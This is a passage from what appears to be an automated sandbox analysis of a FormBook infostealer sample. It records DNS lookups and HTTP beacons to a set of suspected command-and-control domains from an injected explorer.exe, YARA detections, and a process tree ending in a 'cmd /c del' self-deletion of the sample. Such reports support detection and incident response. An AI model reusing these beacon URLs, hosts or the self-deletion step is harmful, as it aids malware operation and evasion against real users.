Oct 13, 2021 20:35:58.509708881 CEST	57525	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:35:58.894642115 CEST	53	57525	8.8.8.8	192.168.2.4
Oct 13, 2021 20:36:09.603306055 CEST	53418	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:36:09.648792982 CEST	53	53418	8.8.8.8	192.168.2.4
Oct 13, 2021 20:36:14.717250109 CEST	59260	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:36:14.855338097 CEST	53	59260	8.8.8.8	192.168.2.4
Oct 13, 2021 20:36:20.411690950 CEST	49944	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:36:20.434771061 CEST	53	49944	8.8.8.8	192.168.2.4
Oct 13, 2021 20:36:25.451200962 CEST	63300	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:36:25.485270977 CEST	53	63300	8.8.8.8	192.168.2.4
Oct 13, 2021 20:36:30.845546007 CEST	61449	53	192.168.2.4	8.8.8.8
Oct 13, 2021 20:36:30.966455936 CEST	53	61449	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 20:35:31.118007898 CEST	192.168.2.4	8.8.8.8	0x5ef5	Standard query (0)	www.nhmingwei.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:37.261835098 CEST	192.168.2.4	8.8.8.8	0xb2d8	Standard query (0)	www.celltecstore.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:42.638209105 CEST	192.168.2.4	8.8.8.8	0xc530	Standard query (0)	www.ps-sac.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:48.010533094 CEST	192.168.2.4	8.8.8.8	0xe23	Standard query (0)	www.txsports.club	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:53.450046062 CEST	192.168.2.4	8.8.8.8	0xa587	Standard query (0)	www.ville-fogalmam.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:58.509708881 CEST	192.168.2.4	8.8.8.8	0xd63d	Standard query (0)	www.rajinderbeas.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:09.603306055 CEST	192.168.2.4	8.8.8.8	0xfbee	Standard query (0)	www.box-770.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:14.717250109 CEST	192.168.2.4	8.8.8.8	0xb48c	Standard query (0)	www.thecrystalconsciousness.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:20.411690950 CEST	192.168.2.4	8.8.8.8	0x707a	Standard query (0)	www.eastsidescooters.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:25.451200962 CEST	192.168.2.4	8.8.8.8	0x9122	Standard query (0)	www.serviciosgeneralesjba.online	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:30.845546007 CEST	192.168.2.4	8.8.8.8	0x3843	Standard query (0)	www.sapphiremodule.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 13, 2021 20:35:31.431078911 CEST	8.8.8.8	192.168.2.4	0x5ef5	No error (0)	www.nhmingwei.com		154.208.173.144	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:37.317528009 CEST	8.8.8.8	192.168.2.4	0xb2d8	No error (0)	www.celltecstore.com	celltec4.mitiendanube.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 20:35:37.317528009 CEST	8.8.8.8	192.168.2.4	0xb2d8	No error (0)	celltec4.mitiendanube.com	mitiendanube.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 20:35:37.317528009 CEST	8.8.8.8	192.168.2.4	0xb2d8	No error (0)	mitiendanube.com		52.5.157.71	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:37.317528009 CEST	8.8.8.8	192.168.2.4	0xb2d8	No error (0)	mitiendanube.com		52.206.238.9	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:37.317528009 CEST	8.8.8.8	192.168.2.4	0xb2d8	No error (0)	mitiendanube.com		52.200.197.31	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:42.748863935 CEST	8.8.8.8	192.168.2.4	0xc530	No error (0)	www.ps-sac.com	ps-sac.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 20:35:42.748863935 CEST	8.8.8.8	192.168.2.4	0xc530	No error (0)	ps-sac.com		67.205.83.103	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:48.146205902 CEST	8.8.8.8	192.168.2.4	0xe23	No error (0)	www.txsports.club	txsports.club		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 20:35:48.146205902 CEST	8.8.8.8	192.168.2.4	0xe23	No error (0)	txsports.club		148.72.177.185	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:53.479887962 CEST	8.8.8.8	192.168.2.4	0xa587	Name error (3)	www.ville-fogalmam.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 20:35:58.894642115 CEST	8.8.8.8	192.168.2.4	0xd63d	No error (0)	www.rajinderbeas.com	rajinderbeas.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 20:35:58.894642115 CEST	8.8.8.8	192.168.2.4	0xd63d	No error (0)	rajinderbeas.com		216.10.241.4	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:09.648792982 CEST	8.8.8.8	192.168.2.4	0xfbee	No error (0)	www.box-770.com		213.186.33.5	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:14.855338097 CEST	8.8.8.8	192.168.2.4	0xb48c	No error (0)	www.thecrystalconsciousness.com	thecrystalconsciousness.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 20:36:14.855338097 CEST	8.8.8.8	192.168.2.4	0xb48c	No error (0)	thecrystalconsciousness.com		31.170.167.144	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:20.434771061 CEST	8.8.8.8	192.168.2.4	0x707a	Name error (3)	www.eastsidescooters.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:25.485270977 CEST	8.8.8.8	192.168.2.4	0x9122	No error (0)	www.serviciosgeneralesjba.online	serviciosgeneralesjba.online		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 20:36:25.485270977 CEST	8.8.8.8	192.168.2.4	0x9122	No error (0)	serviciosgeneralesjba.online		68.65.120.219	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:30.966455936 CEST	8.8.8.8	192.168.2.4	0x3843	No error (0)	www.sapphiremodule.com		44.227.65.245	A (IP address)	IN (0x0001)
Oct 13, 2021 20:36:30.966455936 CEST	8.8.8.8	192.168.2.4	0x3843	No error (0)	www.sapphiremodule.com		44.227.76.166	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.nhmingwei.com

www.celltecstore.com

www.ps-sac.com

www.txsports.club

www.rajinderbeas.com

www.box-770.com

www.thecrystalconsciousness.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49811	154.208.173.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:35:31.965432882 CEST	2577	OUT	GET /ni8b/?ZfEhPp=bnsPHpJ0JXfYedDeyyRM0T59hyvcJozMf52DwVsUkht3MP5YfvQl77Z8cLzJCfxgsHVQ&kTY=TdZdU HTTP/1.1 Host: www.nhmingwei.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49815	52.5.157.71	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:35:37.474766970 CEST	5272	OUT	GET /ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU HTTP/1.1 Host: www.celltecstore.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:35:37.627887964 CEST	5272	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.celltecstore.com/ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49817	67.205.83.103	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:35:42.859961987 CEST	5847	OUT	GET /ni8b/?ZfEhPp=Eseu83Nj43qLBMj7MwWHNBqOzdwc7j/6ub3THp3k2Y03CkKraCnGH8IbXpARdpoCPKFf&kTY=TdZdU HTTP/1.1 Host: www.ps-sac.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:35:42.967576981 CEST	5847	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Oct 2021 18:35:42 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.ps-sac.com/ni8b/?ZfEhPp=Eseu83Nj43qLBMj7MwWHNBqOzdwc7j/6ub3THp3k2Y03CkKraCnGH8IbXpARdpoCPKFf&kTY=TdZdU Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49823	148.72.177.185	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:35:48.294147968 CEST	5859	OUT	GET /ni8b/?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU HTTP/1.1 Host: www.txsports.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:35:48.441919088 CEST	5861	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.21.3 Date: Wed, 13 Oct 2021 18:35:48 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 334 Connection: close Location: http://www.txsports.club/public/ni8b?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU
Oct 13, 2021 20:35:48.441946983 CEST	5861	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.txsports.club/public/ni8b?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49831	216.10.241.4	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:35:59.038064003 CEST	5878	OUT	GET /ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU HTTP/1.1 Host: www.rajinderbeas.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:36:00.009967089 CEST	5879	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Oct 2021 18:35:59 GMT Server: nginx/1.17.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://rajinderbeas.com/ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49833	213.186.33.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:36:09.675868034 CEST	5885	OUT	GET /ni8b/?ZfEhPp=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKnDwsfv+vOIy&kTY=TdZdU HTTP/1.1 Host: www.box-770.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:36:09.701060057 CEST	5888	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Wed, 13 Oct 2021 18:36:09 GMT content-type: text/html content-length: 138 location: http://www.box-770.com x-iplb-request-id: 66818F21:C2A9_D5BA2105:0050_61672719_16AC109C:2FC1 x-iplb-instance: 16978 set-cookie: SERVERID77446=2001710\|YWcnH\|YWcnH; path=/; HttpOnly connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49851	31.170.167.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:36:15.000571966 CEST	5935	OUT	GET /ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU HTTP/1.1 Host: www.thecrystalconsciousness.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 20:36:15.397768974 CEST	5938	IN	HTTP/1.1 301 Moved Permanently Connection: close x-powered-by: PHP/7.4.16 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU x-litespeed-cache: miss content-length: 0 date: Wed, 13 Oct 2021 18:36:15 GMT server: LiteSpeed

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 56460021473877.exe PID: 5240 Parent PID: 6644

General

Start time:	20:34:25
Start date:	13/10/2021
Path:	C:\Users\user\Desktop\56460021473877.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\56460021473877.exe'
Imagebase:	0x40000
File size:	569856 bytes
MD5 hash:	D95E9BB2FA064A984C391B5BFC1D01E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 56460021473877.exe PID: 5276 Parent PID: 5240

General

Start time:	20:34:34
Start date:	13/10/2021
Path:	C:\Users\user\Desktop\56460021473877.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\56460021473877.exe
Imagebase:	0xba0000
File size:	569856 bytes
MD5 hash:	D95E9BB2FA064A984C391B5BFC1D01E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 5276

General

Start time:	20:34:35
Start date:	13/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: control.exe PID: 980 Parent PID: 3424

General

Start time:	20:35:03
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0x2f0000
File size:	114688 bytes
MD5 hash:	40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7156 Parent PID: 980

General

Start time:	20:35:08
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\56460021473877.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7024 Parent PID: 7156

General

Start time:	20:35:09
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 56460021473877.exe PID: 5240 Parent PID: 6644 56460021473877.exeCOMMON

Executed Functions

Function 007E9EB0, Relevance: 1.7, APIs: 1, Instructions: 190COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 007EA0F6

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e002f2d4658c9d5e440053f9ad629500b2065135404b5f8c18ff995a377da0f7
Instruction ID: 8d6f2ee66418da4b7fe204f792f62fd2c6116d00576bdb26ce471d4cf8e21646
Opcode Fuzzy Hash: e002f2d4658c9d5e440053f9ad629500b2065135404b5f8c18ff995a377da0f7
Instruction Fuzzy Hash: 2B713671A01B458FD764DF6AD0447AABBF1BF88304F10892DE58AD7A40EB78E905CF91

Uniqueness

Uniqueness Score: -1.00%

Function 007E41BC, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 007E5711

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0b116a40e547f93e8e233b5f34e2da7b873fad2aaefffcf486905e98958f09dc
Instruction ID: 881eb9d72affd9db448d60669edaa5dbe21ac939c5f9f1a5d824121969c94a66
Opcode Fuzzy Hash: 0b116a40e547f93e8e233b5f34e2da7b873fad2aaefffcf486905e98958f09dc
Instruction Fuzzy Hash: 0841F370C0475CCFDB24DFAAC844B9DBBB5BF88308F21856AD508AB251DB746945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007E5655, Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 007E5711

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fff627950c195e7874b90ae0d58d91f18256fa543d53f2c033ef2ca3fbd21fab
Instruction ID: ec47cb3eb9877855e801dee2ddee5f9eb95196772cf831c6350fdaa3feb52dcc
Opcode Fuzzy Hash: fff627950c195e7874b90ae0d58d91f18256fa543d53f2c033ef2ca3fbd21fab
Instruction Fuzzy Hash: C641D0B1C0461DCFDB24DFAAC884BDDBBB1BF48308F21816AD508AB251DB746946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04942EF0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04942FB1

Memory Dump Source

Source File: 00000000.00000002.698003794.0000000004940000.00000040.00000001.sdmp, Offset: 04940000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5423a058f993072fa4cd4cca8698afc6aa4d6115eb5cbc626869ad928d2a0444
Instruction ID: f3a491d0c7a42ef0fe7577b2f313a3599e7f9d815f5fcd7746cce96b690caba4
Opcode Fuzzy Hash: 5423a058f993072fa4cd4cca8698afc6aa4d6115eb5cbc626869ad928d2a0444
Instruction Fuzzy Hash: 424149B4A00705DFDB14CF99C448EAABBF5FF88314F258599E519AB321D374A841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007EABC4, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,007EC39E,?,?,?,?,?), ref: 007EC45F

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e2a6cf481126efaadc252914f1ed0b797e4dc31bf3e40478f7178340cd2787db
Instruction ID: e017e6bed3f3a8e8436c6967a46469a1165eb9f94c6df64d17b80a31e51e7a46
Opcode Fuzzy Hash: e2a6cf481126efaadc252914f1ed0b797e4dc31bf3e40478f7178340cd2787db
Instruction Fuzzy Hash: A621E5B5901358AFDB10CF9AD884AEEBBF8FB49314F14841AE914A7350D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007EC3D1, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,007EC39E,?,?,?,?,?), ref: 007EC45F

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7f7dd276c3494b04b79d5e1bacdd8bb310c44e822624833f3617d03bedd5e299
Instruction ID: ba0a40adf14bce6db8cfe64e0ca0aa03b5bfaa29d511df45cd2661c1c7d166f9
Opcode Fuzzy Hash: 7f7dd276c3494b04b79d5e1bacdd8bb310c44e822624833f3617d03bedd5e299
Instruction Fuzzy Hash: 2721E3B5D002589FDB10CFA9D884AEEBFF4FB48314F14841AE914A7350D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007E9970, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007EA171,00000800,00000000,00000000), ref: 007EA382

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e07e423b2727b992f27060298a2dfba06fc7417baec5e53f7157354aaecf1a4a
Instruction ID: bcce64302994b8b2273e78e953f8f4bf603f870cc531c2af768c40fd9d7eb3f2
Opcode Fuzzy Hash: e07e423b2727b992f27060298a2dfba06fc7417baec5e53f7157354aaecf1a4a
